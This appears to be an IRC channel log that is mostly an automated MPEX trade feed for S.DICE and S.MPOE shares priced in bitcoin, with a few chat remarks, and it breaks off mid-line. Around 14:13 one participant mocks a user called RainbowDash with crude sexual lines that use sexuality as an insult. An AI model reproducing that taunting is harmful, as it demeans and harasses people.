[+] Dec 03 02:39:12 [MPEX] [S.DICE] 1569 @ 0.00332656 = 5.2194 BTC [+] Dec 03 02:39:14 [MPEX] [S.DICE] 1054 @ 0.00332977 = 3.5096 BTC [+] Dec 03 02:42:23 [MPEX] [S.MPOE] 14416 @ 0.00051754 = 7.4609 BTC [+] Dec 03 02:42:24 [MPEX] [S.MPOE] 1377 @ 0.00051824 = 0.7136 BTC [+] Dec 03 02:42:26 [MPEX] [S.MPOE] 26200 @ 0.00051857 = 13.5865 BTC [+] Dec 03 02:42:27 [MPEX] [S.MPOE] 4171 @ 0.000519 = 2.1647 BTC [+] Dec 03 02:46:28 [MPEX] [S.DICE] 2300 @ 0.00332977 = 7.6585 BTC [+] Dec 03 02:49:26 [MPEX] [S.MPOE] 4321 @ 0.00051548 = 2.2274 BTC [-] Dec 03 02:49:27 [MPEX] [S.MPOE] 16600 @ 0.00051536 = 8.555 BTC [-] Dec 03 02:49:29 [MPEX] [S.MPOE] 8001 @ 0.00050706 = 4.057 BTC [-] Dec 03 02:49:29 [MPEX] [S.MPOE] 1328 @ 0.00050654 = 0.6727 BTC [-] Dec 03 02:51:01 [MPEX] [S.MPOE] 4321 @ 0.00051869 = 2.2413 BTC [+] Dec 03 02:51:03 [MPEX] [S.MPOE] 10299 @ 0.000519 = 5.3452 BTC [+] Dec 03 02:57:22 [MPEX] [S.MPOE] 7180 @ 0.000519 = 3.7264 BTC [+] Dec 03 02:57:24 [MPEX] [S.MPOE] 14420 @ 0.00051915 = 7.4861 BTC [+] Dec 03 03:03:52 [MPEX] [S.MPOE] 4321 @ 0.00050656 = 2.1888 BTC [-] Dec 03 03:03:53 [MPEX] [S.MPOE] 5279 @ 0.00050654 = 2.674 BTC [-] Dec 03 03:04:54 [MPEX] [S.MPOE] 4321 @ 0.00051067 = 2.2066 BTC [+] Dec 03 03:04:55 [MPEX] [S.MPOE] 44679 @ 0.0005108 = 22.822 BTC [+] Dec 03 03:07:37 [MPEX] [S.MPOE] 4321 @ 0.00050689 = 2.1903 BTC [-] Dec 03 03:07:39 [MPEX] [S.MPOE] 22179 @ 0.00050654 = 11.2346 BTC [-] Dec 03 03:13:53 [MPEX] [S.MPOE] 26800 @ 0.00050654 = 13.5753 BTC [-] Dec 03 03:17:27 [MPEX] [S.MPOE] 10636 @ 0.00050654 = 5.3876 BTC [-] Dec 03 03:28:32 [MPEX] [S.MPOE] 4321 @ 0.00051077 = 2.207 BTC [+] Dec 03 03:28:34 [MPEX] [S.MPOE] 6871 @ 0.0005108 = 3.5097 BTC [+] Dec 03 03:28:35 [MPEX] [S.MPOE] 7930 @ 0.00051915 = 4.1169 BTC [+] Dec 03 03:28:36 [MPEX] [S.MPOE] 7167 @ 0.00051951 = 3.7233 BTC [+] Dec 03 03:28:38 [MPEX] [S.MPOE] 14076 @ 0.00051959 = 7.3137 BTC [+] Dec 03 03:29:28 [MPEX] [S.MPOE] 6200 @ 0.00051959 = 3.2215 BTC [+] Dec 03 03:35:58 [MPEX] [S.MPOE] 9350 @ 0.00051959 = 4.8582 BTC [+] Dec 03 03:39:09 [MPEX] [S.MPOE] 3100 @ 0.00051959 = 1.6107 BTC [+] Dec 03 03:42:42 [MPEX] [S.MPOE] 4321 @ 0.00050681 = 2.1899 BTC [-] Dec 03 03:42:43 [MPEX] [S.MPOE] 17300 @ 0.00050666 = 8.7652 BTC [-] Dec 03 03:42:45 [MPEX] [S.MPOE] 15773 @ 0.00050654 = 7.9897 BTC [-] Dec 03 03:42:46 [MPEX] [S.MPOE] 7106 @ 0.00050618 = 3.5969 BTC [-] Dec 03 03:53:05 [MPEX] [S.MPOE] 3000 @ 0.00050618 = 1.5185 BTC [-] Dec 03 04:02:45 [MPEX] [S.MPOE] 21163 @ 0.00050618 = 10.7123 BTC [-] Dec 03 04:02:46 [MPEX] [S.MPOE] 10708 @ 0.00050618 = 5.4202 BTC [-] Dec 03 04:02:48 [MPEX] [S.MPOE] 14561 @ 0.00050606 = 7.3687 BTC [-] Dec 03 04:11:06 [MPEX] [S.MPOE] 11627 @ 0.00050606 = 5.884 BTC [-] Dec 03 04:11:07 [MPEX] [S.MPOE] 12573 @ 0.00050602 = 6.3622 BTC [-] Dec 03 04:26:35 [MPEX] [S.MPOE] 655 @ 0.00050602 = 0.3314 BTC [-] Dec 03 04:26:36 [MPEX] [S.MPOE] 19050 @ 0.00050601 = 9.6395 BTC [-] Dec 03 04:26:38 [MPEX] [S.MPOE] 9995 @ 0.00050599 = 5.0574 BTC [-] Dec 03 04:30:29 [MPEX] [S.MPOE] 4321 @ 0.00050893 = 2.1991 BTC [+] Dec 03 04:30:31 [MPEX] [S.MPOE] 13590 @ 0.00050899 = 6.9172 BTC [+] Dec 03 04:34:00 [MPEX] [S.DICE] 2100 @ 0.00332977 = 6.9925 BTC [+] Dec 03 04:35:08 [MPEX] [S.MPOE] 4321 @ 0.00050619 = 2.1872 BTC [-] Dec 03 04:35:10 [MPEX] [S.MPOE] 5155 @ 0.00050599 = 2.6084 BTC [-] Dec 03 04:35:11 [MPEX] [S.MPOE] 12624 @ 0.00050599 = 6.3876 BTC [-] Dec 03 04:44:17 [MPEX] [S.MPOE] 4321 @ 0.00050883 = 2.1987 BTC [+] Dec 03 04:44:18 [MPEX] [S.MPOE] 610 @ 0.00050899 = 0.3105 BTC [+] Dec 03 04:44:19 [MPEX] [S.MPOE] 2869 @ 0.00050914 = 1.4607 BTC [+] Dec 03 04:46:36 [MPEX] [S.MPOE] 12131 @ 0.00050914 = 6.1764 BTC [+] Dec 03 04:46:38 [MPEX] [S.MPOE] 11669 @ 0.00050956 = 5.9461 BTC [+] Dec 03 04:50:58 [MPEX] [S.DICE] 1364 @ 0.00332977 = 4.5418 BTC [+] Dec 03 05:00:01 [MPEX] [S.MPOE] 17609 @ 0.00050956 = 8.9728 BTC [+] Dec 03 05:00:03 [MPEX] [S.MPOE] 7291 @ 0.00051102 = 3.7258 BTC [+] Dec 03 05:06:49 [MPEX] [S.MPOE] 4321 @ 0.00050627 = 2.1876 BTC [-] Dec 03 05:06:49 [MPEX] [S.MPOE] 1276 @ 0.00050599 = 0.6456 BTC [-] Dec 03 05:06:51 [MPEX] [S.MPOE] 7750 @ 0.00050586 = 3.9204 BTC [-] Dec 03 05:06:52 [MPEX] [S.MPOE] 16530 @ 0.00050579 = 8.3607 BTC [-] Dec 03 05:07:39 [MPEX] [S.MPOE] 10362 @ 0.00050579 = 5.241 BTC [-] Dec 03 05:07:41 [MPEX] [S.MPOE] 1988 @ 0.00050578 = 1.0055 BTC [-] Dec 03 05:09:14 [MPEX] [S.MPOE] 4321 @ 0.00050678 = 2.1898 BTC [+] Dec 03 05:09:16 [MPEX] [S.MPOE] 17900 @ 0.00050711 = 9.0773 BTC [+] Dec 03 05:09:17 [MPEX] [S.MPOE] 20941 @ 0.0005148 = 10.7804 BTC [+] Dec 03 05:09:20 [MPEX] [S.MPOE] 3009 @ 0.00051102 = 1.5377 BTC [-] Dec 03 05:12:55 Too much MPOE! Dec 03 05:15:40 [MPEX] [S.MPOE] 4321 @ 0.00050582 = 2.1856 BTC [-] Dec 03 05:15:42 [MPEX] [S.MPOE] 5912 @ 0.00050578 = 2.9902 BTC [-] Dec 03 05:15:43 [MPEX] [S.MPOE] 21300 @ 0.00050578 = 10.7731 BTC [-] Dec 03 05:15:43 [MPEX] [S.MPOE] 9367 @ 0.00050574 = 4.7373 BTC [-] Dec 03 05:18:08 lol Dec 03 05:18:21 there's like... one sdice lost in the sea Dec 03 05:18:24 [MPEX] [S.MPOE] 11000 @ 0.00050618 = 5.568 BTC [+] Dec 03 05:19:03 I see 7 since the last time I checked. Dec 03 05:19:39 apparently teh ppl din't like nov results so much. Dec 03 05:19:47 [MPEX] [S.MPOE] 13100 @ 0.00051445 = 6.7393 BTC [+] Dec 03 05:23:29 [MPEX] [S.MPOE] 1833 @ 0.00050574 = 0.927 BTC [-] Dec 03 05:23:31 [MPEX] [S.MPOE] 11500 @ 0.00050562 = 5.8146 BTC [-] Dec 03 05:23:33 [MPEX] [S.MPOE] 12467 @ 0.00050555 = 6.3027 BTC [-] Dec 03 05:36:08 [MPEX] [S.MPOE] 4321 @ 0.00050626 = 2.1875 BTC [+] Dec 03 05:36:10 [MPEX] [S.MPOE] 7379 @ 0.00050656 = 3.7379 BTC [+] Dec 03 05:38:48 [MPEX] [S.MPOE] 4321 @ 0.00050581 = 2.1856 BTC [-] Dec 03 05:38:50 [MPEX] [S.MPOE] 4133 @ 0.00050555 = 2.0894 BTC [-] Dec 03 05:38:51 [MPEX] [S.MPOE] 5550 @ 0.00050554 = 2.8057 BTC [-] Dec 03 05:38:51 [MPEX] [S.MPOE] 18950 @ 0.00050551 = 9.5794 BTC [-] Dec 03 05:38:52 [MPEX] [S.MPOE] 7546 @ 0.0005055 = 3.8145 BTC [-] Dec 03 05:45:24 [MPEX] [S.MPOE] 5354 @ 0.0005055 = 2.7064 BTC [-] Dec 03 05:45:25 [MPEX] [S.MPOE] 16500 @ 0.00050547 = 8.3403 BTC [-] Dec 03 05:45:27 [MPEX] [S.MPOE] 3246 @ 0.00050532 = 1.6403 BTC [-] Dec 03 05:46:34 [MPEX] [S.MPOE] 5304 @ 0.00050532 = 2.6802 BTC [-] Dec 03 05:46:35 [MPEX] [S.MPOE] 14795 @ 0.00050517 = 7.474 BTC [-] Dec 03 05:46:37 [MPEX] [S.MPOE] 14506 @ 0.00050511 = 7.3271 BTC [-] Dec 03 05:50:39 [MPEX] [S.MPOE] 4321 @ 0.00050644 = 2.1883 BTC [+] Dec 03 05:50:41 [MPEX] [S.MPOE] 10939 @ 0.00050656 = 5.5413 BTC [+] Dec 03 05:50:42 [MPEX] [S.MPOE] 2240 @ 0.00050934 = 1.1409 BTC [+] Dec 03 05:59:22 [MPEX] [S.MPOE] 4321 @ 0.00050526 = 2.1832 BTC [-] Dec 03 05:59:23 [MPEX] [S.MPOE] 2579 @ 0.00050511 = 1.3027 BTC [-] Dec 03 06:10:16 What results? Dec 03 06:11:56 nvm, I see them Dec 03 06:12:17 Ah, well there's good and bad months. Dec 03 06:16:19 [MPEX] [S.MPOE] 16915 @ 0.00050511 = 8.5439 BTC [-] Dec 03 06:16:20 [MPEX] [S.MPOE] 7000 @ 0.00050503 = 3.5352 BTC [-] Dec 03 06:16:20 [MPEX] [S.MPOE] 7200 @ 0.00050496 = 3.6357 BTC [-] Dec 03 06:16:23 [MPEX] [S.MPOE] 1135 @ 0.00050489 = 0.5731 BTC [-] Dec 03 06:17:38 [MPEX] [S.MPOE] 6950 @ 0.00050489 = 3.509 BTC [-] Dec 03 06:19:50 [MPEX] [S.DICE] 1731 @ 0.00326536 = 5.6523 BTC [-] Dec 03 06:19:51 [MPEX] [S.DICE] 721 @ 0.0032648 = 2.3539 BTC [-] Dec 03 06:19:53 [MPEX] [S.DICE] 1550 @ 0.0032587 = 5.051 BTC [-] Dec 03 06:19:54 [MPEX] [S.DICE] 298 @ 0.00325525 = 0.9701 BTC [-] Dec 03 06:25:44 [MPEX] [S.MPOE] 4054 @ 0.0005056 = 2.0497 BTC [+] Dec 03 06:27:58 [MPEX] [S.MPOE] 26234 @ 0.0005056 = 13.2639 BTC [+] Dec 03 06:28:00 [MPEX] [S.MPOE] 1050 @ 0.00050576 = 0.531 BTC [+] Dec 03 06:41:01 [MPEX] [S.MPOE] 4321 @ 0.00050567 = 2.185 BTC [-] Dec 03 06:41:02 [MPEX] [S.MPOE] 1150 @ 0.00050576 = 0.5816 BTC [+] Dec 03 06:41:04 [MPEX] [S.MPOE] 2360 @ 0.00050934 = 1.202 BTC [+] Dec 03 06:41:06 [MPEX] [S.MPOE] 4069 @ 0.0005148 = 2.0947 BTC [+] Dec 03 06:41:46 [MPEX] [S.MPOE] 4321 @ 0.00050506 = 2.1824 BTC [-] Dec 03 06:41:48 [MPEX] [S.MPOE] 3529 @ 0.00050489 = 1.7818 BTC [-] Dec 03 06:46:15 [MPEX] [S.DICE] 3750 @ 0.00325525 = 12.2072 BTC [-] Dec 03 06:53:21 [MPEX] [S.MPOE] 4321 @ 0.00051476 = 2.2243 BTC [+] Dec 03 06:53:22 [MPEX] [S.MPOE] 6090 @ 0.0005148 = 3.1351 BTC [+] Dec 03 07:01:20 [MPEX] [S.MPOE] 23100 @ 0.00051623 = 11.9249 BTC [+] Dec 03 07:03:10 [MPEX] [S.MPOE] 4750 @ 0.00051623 = 2.4521 BTC [+] Dec 03 07:03:11 [MPEX] [S.MPOE] 652 @ 0.00051959 = 0.3388 BTC [+] Dec 03 07:03:13 [MPEX] [S.MPOE] 8348 @ 0.00051962 = 4.3378 BTC [+] Dec 03 07:05:43 [MPEX] [S.MPOE] 5754 @ 0.00051962 = 2.9899 BTC [+] Dec 03 07:16:00 [MPEX] [S.MPOE] 10782 @ 0.00051962 = 5.6025 BTC [+] Dec 03 07:23:30 [MPEX] [S.MPOE] 6100 @ 0.0005157 = 3.1458 BTC [-] Dec 03 07:26:09 [MPEX] [S.MPOE] 19000 @ 0.0005157 = 9.7983 BTC [-] Dec 03 07:26:11 [MPEX] [S.MPOE] 5400 @ 0.0005153 = 2.7826 BTC [-] Dec 03 07:28:39 [MPEX] [S.MPOE] 7380 @ 0.00051962 = 3.8348 BTC [+] Dec 03 07:28:41 [MPEX] [S.MPOE] 7200 @ 0.00051981 = 3.7426 BTC [+] Dec 03 07:28:42 [MPEX] [S.MPOE] 4220 @ 0.00051992 = 2.1941 BTC [+] Dec 03 07:31:09 [MPEX] [S.MPOE] 3989 @ 0.0005153 = 2.0555 BTC [-] Dec 03 07:34:38 [MPEX] [S.MPOE] 29911 @ 0.00050697 = 15.164 BTC [-] Dec 03 07:34:39 [MPEX] [S.MPOE] 7089 @ 0.00051992 = 3.6857 BTC [+] Dec 03 07:39:03 [MPEX] [S.MPOE] 6552 @ 0.00051992 = 3.4065 BTC [+] Dec 03 07:41:56 [MPEX] [S.MPOE] 4321 @ 0.00050508 = 2.1825 BTC [-] Dec 03 07:41:56 [MPEX] [S.MPOE] 4199 @ 0.00050489 = 2.12 BTC [-] Dec 03 07:41:58 [MPEX] [S.MPOE] 8080 @ 0.00050485 = 4.0792 BTC [-] Dec 03 07:45:03 [MPEX] [S.DICE] 552 @ 0.00325525 = 1.7969 BTC [-] Dec 03 07:45:05 [MPEX] [S.DICE] 2021 @ 0.00325123 = 6.5707 BTC [-] Dec 03 07:47:36 [MPEX] [S.MPOE] 7500 @ 0.00050485 = 3.7864 BTC [-] Dec 03 08:00:35 [MPEX] [S.MPOE] 14384 @ 0.00050485 = 7.2618 BTC [-] Dec 03 08:00:35 [MPEX] [S.MPOE] 12004 @ 0.00050482 = 6.0599 BTC [-] Dec 03 08:04:51 [MPEX] [S.MPOE] 4321 @ 0.00051098 = 2.2079 BTC [+] Dec 03 08:04:52 [MPEX] [S.MPOE] 11979 @ 0.00051127 = 6.1245 BTC [+] Dec 03 08:18:25 [MPEX] [S.DICE] 1500 @ 0.00332977 = 4.9947 BTC [+] Dec 03 08:19:23 [MPEX] [S.MPOE] 7771 @ 0.00051127 = 3.9731 BTC [+] Dec 03 08:23:51 [MPEX] [S.MPOE] 14079 @ 0.00051249 = 7.2153 BTC [+] Dec 03 08:25:05 [MPEX] [S.MPOE] 1434 @ 0.00051249 = 0.7349 BTC [+] Dec 03 08:25:07 [MPEX] [S.MPOE] 14530 @ 0.00050896 = 7.3952 BTC [-] Dec 03 08:25:08 [MPEX] [S.MPOE] 736 @ 0.00050482 = 0.3715 BTC [-] Dec 03 08:34:30 [MPEX] [S.MPOE] 4321 @ 0.00050495 = 2.1819 BTC [+] Dec 03 08:34:31 [MPEX] [S.MPOE] 1679 @ 0.00050482 = 0.8476 BTC [-] Dec 03 08:43:54 [MPEX] [S.MPOE] 4321 @ 0.00050665 = 2.1892 BTC [+] Dec 03 08:43:55 [MPEX] [S.MPOE] 3379 @ 0.00050692 = 1.7129 BTC [+] Dec 03 08:47:28 [MPEX] [S.MPOE] 9272 @ 0.00050692 = 4.7002 BTC [+] Dec 03 08:47:28 [MPEX] [S.MPOE] 20987 @ 0.00050703 = 10.641 BTC [+] Dec 03 08:53:33 [MPEX] [S.MPOE] 9638 @ 0.00051992 = 5.011 BTC [+] Dec 03 08:53:34 [MPEX] [S.MPOE] 5412 @ 0.00052019 = 2.8153 BTC [+] Dec 03 08:58:03 [MPEX] [S.MPOE] 5291 @ 0.00050856 = 2.6908 BTC [-] Dec 03 08:58:04 [MPEX] [S.MPOE] 19035 @ 0.00050843 = 9.678 BTC [-] Dec 03 09:01:48 [MPEX] [S.MPOE] 13966 @ 0.00050843 = 7.1007 BTC [-] Dec 03 09:01:49 [MPEX] [S.MPOE] 1334 @ 0.00050535 = 0.6741 BTC [-] Dec 03 09:03:57 [MPEX] [S.MPOE] 10058 @ 0.0005148 = 5.1779 BTC [+] Dec 03 09:03:59 [MPEX] [S.MPOE] 20177 @ 0.00051592 = 10.4097 BTC [+] Dec 03 09:05:18 [MPEX] [S.MPOE] 4321 @ 0.00050548 = 2.1842 BTC [-] Dec 03 09:05:19 [MPEX] [S.MPOE] 10810 @ 0.00050535 = 5.4628 BTC [-] Dec 03 09:05:21 [MPEX] [S.MPOE] 8661 @ 0.00050482 = 4.3722 BTC [-] Dec 03 09:13:05 [MPEX] [S.MPOE] 6650 @ 0.00050482 = 3.3571 BTC [-] Dec 03 09:19:36 [MPEX] [S.MPOE] 4321 @ 0.00051588 = 2.2291 BTC [+] Dec 03 09:19:38 [MPEX] [S.MPOE] 6123 @ 0.00051592 = 3.159 BTC [+] Dec 03 09:23:39 [MPEX] [S.MPOE] 13328 @ 0.00051964 = 6.9258 BTC [+] Dec 03 09:35:04 [MPEX] [S.MPOE] 10400 @ 0.00052019 = 5.41 BTC [+] Dec 03 09:35:45 [MPEX] [S.MPOE] 15100 @ 0.00052019 = 7.8549 BTC [+] Dec 03 09:45:39 [MPEX] [S.MPOE] 2445 @ 0.00051964 = 1.2705 BTC [-] Dec 03 09:45:40 [MPEX] [S.MPOE] 10050 @ 0.0005134 = 5.1597 BTC [-] Dec 03 09:45:42 [MPEX] [S.MPOE] 5128 @ 0.00051245 = 2.6278 BTC [-] Dec 03 09:45:43 [MPEX] [S.MPOE] 5525 @ 0.00051157 = 2.8264 BTC [-] Dec 03 09:47:47 [MPEX] [S.MPOE] 10172 @ 0.00052019 = 5.2914 BTC [+] Dec 03 09:47:48 [MPEX] [S.MPOE] 12450 @ 0.00052023 = 6.4769 BTC [+] Dec 03 09:47:50 [MPEX] [S.MPOE] 78 @ 0.00052059 = 0.0406 BTC [+] Dec 03 09:48:24 [MPEX] [S.MPOE] 4321 @ 0.00051159 = 2.2106 BTC [-] Dec 03 09:48:26 [MPEX] [S.MPOE] 10150 @ 0.00051157 = 5.1924 BTC [-] Dec 03 09:52:16 [MPEX] [S.MPOE] 4321 @ 0.0005205 = 2.2491 BTC [+] Dec 03 09:52:18 [MPEX] [S.MPOE] 18922 @ 0.00052059 = 9.8506 BTC [+] Dec 03 09:52:19 [MPEX] [S.MPOE] 2457 @ 0.00052066 = 1.2793 BTC [+] Dec 03 09:58:34 [MPEX] [S.MPOE] 6000 @ 0.00052066 = 3.124 BTC [+] Dec 03 10:03:41 [MPEX] [S.MPOE] 12750 @ 0.00052041 = 6.6352 BTC [-] Dec 03 10:07:12 [MPEX] [S.MPOE] 4500 @ 0.00052041 = 2.3418 BTC [-] Dec 03 10:07:13 [MPEX] [S.MPOE] 5650 @ 0.00052066 = 2.9417 BTC [+] Dec 03 10:07:46 [MPEX] [S.MPOE] 4321 @ 0.00051871 = 2.2413 BTC [-] Dec 03 10:07:48 [MPEX] [S.MPOE] 11879 @ 0.00051851 = 6.1594 BTC [-] Dec 03 10:19:11 [MPEX] [S.MPOE] 11300 @ 0.00051851 = 5.8592 BTC [-] Dec 03 10:19:50 [MPEX] [S.MPOE] 3521 @ 0.00051851 = 1.8257 BTC [-] Dec 03 10:19:51 [MPEX] [S.MPOE] 18879 @ 0.00051391 = 9.7021 BTC [-] Dec 03 10:27:08 [MPEX] [S.DICE] 500 @ 0.00328158 = 1.6408 BTC [-] Dec 03 10:31:25 [MPEX] [S.MPOE] 28821 @ 0.00051391 = 14.8114 BTC [-] Dec 03 10:31:27 [MPEX] [S.MPOE] 2583 @ 0.00051157 = 1.3214 BTC [-] Dec 03 10:31:28 [MPEX] [S.MPOE] 243 @ 0.00050698 = 0.1232 BTC [-] Dec 03 10:44:10 [MPEX] [S.MPOE] 16710 @ 0.00051664 = 8.6331 BTC [+] Dec 03 10:44:11 [MPEX] [S.MPOE] 4560 @ 0.00051655 = 2.3555 BTC [-] Dec 03 10:44:12 [MPEX] [S.MPOE] 9175 @ 0.00051245 = 4.7017 BTC [-] Dec 03 10:50:48 [MPEX] [S.MPOE] 21013 @ 0.00051245 = 10.7681 BTC [-] Dec 03 10:50:49 [MPEX] [S.MPOE] 12387 @ 0.00050698 = 6.28 BTC [-] Dec 03 10:58:45 [MPEX] [S.MPOE] 16382 @ 0.00050698 = 8.3053 BTC [-] Dec 03 10:58:47 [MPEX] [S.MPOE] 3336 @ 0.00050482 = 1.6841 BTC [-] Dec 03 11:06:07 [MPEX] [S.MPOE] 11960 @ 0.00051827 = 6.1985 BTC [+] Dec 03 11:12:44 [MPEX] [S.MPOE] 13800 @ 0.00050688 = 6.9949 BTC [-] Dec 03 11:12:45 [MPEX] [S.MPOE] 2750 @ 0.00050482 = 1.3883 BTC [-] Dec 03 11:15:39 [MPEX] [S.MPOE] 13000 @ 0.00050482 = 6.5627 BTC [-] Dec 03 11:22:39 [MPEX] [S.MPOE] 3600 @ 0.00051631 = 1.8587 BTC [+] Dec 03 11:22:40 [MPEX] [S.MPOE] 10440 @ 0.00051827 = 5.4107 BTC [+] Dec 03 11:22:42 [MPEX] [S.MPOE] 17100 @ 0.00052065 = 8.9031 BTC [+] Dec 03 11:22:43 [MPEX] [S.MPOE] 5052 @ 0.00052066 = 2.6304 BTC [+] Dec 03 11:22:43 [MPEX] [S.MPOE] 15350 @ 0.00052074 = 7.9934 BTC [+] Dec 03 11:27:46 [MPEX] [S.MPOE] 4200 @ 0.00051615 = 2.1678 BTC [-] Dec 03 11:34:09 [MPEX] [S.MPOE] 17400 @ 0.00051615 = 8.981 BTC [-] Dec 03 11:47:27 [MPEX] [S.MPOE] 10000 @ 0.00051498 = 5.1498 BTC [-] Dec 03 11:53:28 [MPEX] [S.MPOE] 21300 @ 0.00051498 = 10.9691 BTC [-] Dec 03 11:53:29 [MPEX] [S.MPOE] 19054 @ 0.00051379 = 9.7898 BTC [-] Dec 03 11:53:30 [MPEX] [S.MPOE] 1384 @ 0.00050482 = 0.6987 BTC [-] Dec 03 11:53:32 [MPEX] [S.MPOE] 3863 @ 0.00050477 = 1.9499 BTC [-] Dec 03 12:06:08 [MPEX] [S.MPOE] 20325 @ 0.00050477 = 10.2595 BTC [-] Dec 03 12:06:09 [MPEX] [S.MPOE] 4050 @ 0.00050473 = 2.0442 BTC [-] Dec 03 12:06:10 [MPEX] [S.MPOE] 5225 @ 0.00050445 = 2.6358 BTC [-] Dec 03 12:09:21 [MPEX] [S.MPOE] 5750 @ 0.00051615 = 2.9679 BTC [+] Dec 03 12:11:33 [MPEX] [S.MPOE] 842 @ 0.00051615 = 0.4346 BTC [+] Dec 03 12:11:34 [MPEX] [S.MPOE] 13208 @ 0.0005165 = 6.8219 BTC [+] Dec 03 12:21:04 [MPEX] [S.MPOE] 25300 @ 0.00050975 = 12.8967 BTC [-] Dec 03 12:21:04 [MPEX] [S.MPOE] 1800 @ 0.00050445 = 0.908 BTC [-] Dec 03 12:25:37 [MPEX] [S.MPOE] 23050 @ 0.00050445 = 11.6276 BTC [-] Dec 03 12:25:38 [MPEX] [S.MPOE] 50 @ 0.00050443 = 0.0252 BTC [-] Dec 03 12:45:14 [MPEX] [S.MPOE] 29173 @ 0.00050472 = 14.7242 BTC [+] Dec 03 12:45:16 [MPEX] [S.MPOE] 5127 @ 0.00050967 = 2.6131 BTC [+] Dec 03 12:52:02 [MPEX] [S.MPOE] 11500 @ 0.00050967 = 5.8612 BTC [+] Dec 03 12:54:19 [MPEX] [S.MPOE] 11200 @ 0.00050443 = 5.6496 BTC [-] Dec 03 12:54:20 [MPEX] [S.MPOE] 9750 @ 0.00050441 = 4.918 BTC [-] Dec 03 12:54:22 [MPEX] [S.MPOE] 5250 @ 0.00050437 = 2.6479 BTC [-] Dec 03 12:54:22 [MPEX] [S.MPOE] 1250 @ 0.00050431 = 0.6304 BTC [-] Dec 03 13:03:49 [MPEX] [S.MPOE] 3200 @ 0.00050734 = 1.6235 BTC [+] Dec 03 13:08:13 [MPEX] [S.MPOE] 16693 @ 0.00050559 = 8.4398 BTC [-] Dec 03 13:08:14 [MPEX] [S.MPOE] 12552 @ 0.00050431 = 6.3301 BTC [-] Dec 03 13:12:13 [MPEX] [S.MPOE] 30848 @ 0.00050431 = 15.557 BTC [-] Dec 03 13:12:14 [MPEX] [S.MPOE] 15100 @ 0.00050425 = 7.6142 BTC [-] Dec 03 13:12:15 [MPEX] [S.MPOE] 11000 @ 0.00050422 = 5.5464 BTC [-] Dec 03 13:12:16 [MPEX] [S.MPOE] 4052 @ 0.00050422 = 2.0431 BTC [-] Dec 03 13:14:21 [MPEX] [S.MPOE] 4321 @ 0.00050728 = 2.192 BTC [+] Dec 03 13:14:23 [MPEX] [S.MPOE] 17829 @ 0.00050734 = 9.0454 BTC [+] Dec 03 13:23:30 [MPEX] [S.MPOE] 4321 @ 0.00050427 = 2.179 BTC [-] Dec 03 13:23:32 [MPEX] [S.MPOE] 16673 @ 0.00050422 = 8.4069 BTC [-] Dec 03 13:23:33 [MPEX] [S.MPOE] 1406 @ 0.0005042 = 0.7089 BTC [-] Dec 03 13:25:29 [MPEX] [S.MPOE] 4321 @ 0.00050733 = 2.1922 BTC [+] Dec 03 13:25:30 [MPEX] [S.MPOE] 6771 @ 0.00050734 = 3.4352 BTC [+] Dec 03 13:32:06 [MPEX] [S.MPOE] 11373 @ 0.00050967 = 5.7965 BTC [+] Dec 03 13:32:07 [MPEX] [S.MPOE] 12866 @ 0.00051209 = 6.5885 BTC [+] Dec 03 13:41:15 [MPEX] [S.MPOE] 7161 @ 0.00051505 = 3.6883 BTC [+] Dec 03 13:41:16 [MPEX] [S.MPOE] 2639 @ 0.00050821 = 1.3412 BTC [-] Dec 03 13:44:48 [MPEX] [S.MPOE] 21892 @ 0.0005165 = 11.3072 BTC [+] Dec 03 13:44:50 [MPEX] [S.MPOE] 6058 @ 0.00051816 = 3.139 BTC [+] Dec 03 13:52:13 [MPEX] [S.MPOE] 10442 @ 0.00051816 = 5.4106 BTC [+] Dec 03 14:00:54 [MPEX] [S.MPOE] 7940 @ 0.00051839 = 4.116 BTC [+] Dec 03 14:02:33 [MPEX] [S.DICE] 2000 @ 0.00328158 = 6.5632 BTC [-] Dec 03 14:02:34 [MPEX] [S.DICE] 679 @ 0.00325123 = 2.2076 BTC [-] Dec 03 14:02:38 [MPEX] [S.DICE] 794 @ 0.00325044 = 2.5808 BTC [-] Dec 03 14:05:35 [MPEX] [S.MPOE] 4268 @ 0.00051839 = 2.2125 BTC [+] Dec 03 14:05:36 [MPEX] [S.MPOE] 13300 @ 0.00051132 = 6.8006 BTC [-] Dec 03 14:05:38 [MPEX] [S.MPOE] 17832 @ 0.00050821 = 9.0624 BTC [-] Dec 03 14:13:49 look at me I'm RainbowDash Dec 03 14:13:54 I don't set enforce on my nick Dec 03 14:13:58 meh meh meh meh meh Dec 03 14:14:02 I have a tiny penis Dec 03 14:14:07 and like sex with men Dec 03 14:14:31 [MPEX] [S.MPOE] 29300 @ 0.00051738 = 15.1592 BTC [+] Dec 03 14:14:33 [MPEX] [S.MPOE] 1700 @ 0.00051992 = 0.8839 BTC [+] Dec 03 14:19:53 [MPEX] [S.MPOE] 3189 @ 0.00051992 = 1.658 BTC [+] Dec 03 14:22:51 [MPEX] [S.MPOE] 22011 @ 0.00051992 = 11.444 BTC [+] Dec 03 14:22:52 [MPEX] [S.MPOE] 18500 @ 0.00052064 = 9.6318 BTC [+] Dec 03 14:22:53 [MPEX] [S.MPOE] 11770 @ 0.00052074 = 6.1291 BTC [+] Dec 03 14:22:54 [MPEX] [S.MPOE] 2300 @ 0.00052076 = 1.1977 BTC [+] Dec 03 14:22:56 [MPEX] [S.MPOE] 5750 @ 0.00052079 = 2.9945 BTC [+] Dec 03 14:24:21 [MPEX] [S.MPOE] 3137 @ 0.00050821 = 1.5943 BTC [-] Dec 03 14:26:59 [MPEX] [S.DICE] 280 @ 0.00332977 = 0.9323 BTC [+] Dec 03 14:34:23 [MPEX] [S.MPOE] 24500 @ 0.00050701 = 12.4217 BTC [-] Dec 03 14:34:28 [MPEX] [S.MPOE] 9650 @ 0.0005066 = 4.8887 BTC [-] Dec 03 14:38:10 [MPEX] [S.MPOE] 14085 @ 0.00050727 = 7.1449 BTC [+] Dec 03 14:38:15 [MPEX] [S.MPOE] 6693 @ 0.00051071 = 3.4182 BTC [+] Dec 03 14:42:38 [MPEX] [S.MPOE] 18100 @ 0.0005104 = 9.2382 BTC [-] Dec 03 14:43:50 [MPEX] [S.MPOE] 8344 @ 0.00050986 = 4.2543 BTC [-] Dec 03 14:45:55 [MPEX] [S.MPOE] 4321 @ 0.00050692 = 2.1904 BTC [-] Dec 03 14:45:56 [MPEX] [S.MPOE] 17929 @ 0.0005066 = 9.0828 BTC [-] Dec 03 14:57:53 [MPEX] [S.MPOE] 32400 @ 0.00050831 = 16.4692 BTC [+] Dec 03 15:03:37 [MPEX] [S.MPOE] 1800 @ 0.00050831 = 0.915 BTC [+] Dec 03 15:03:38 [MPEX] 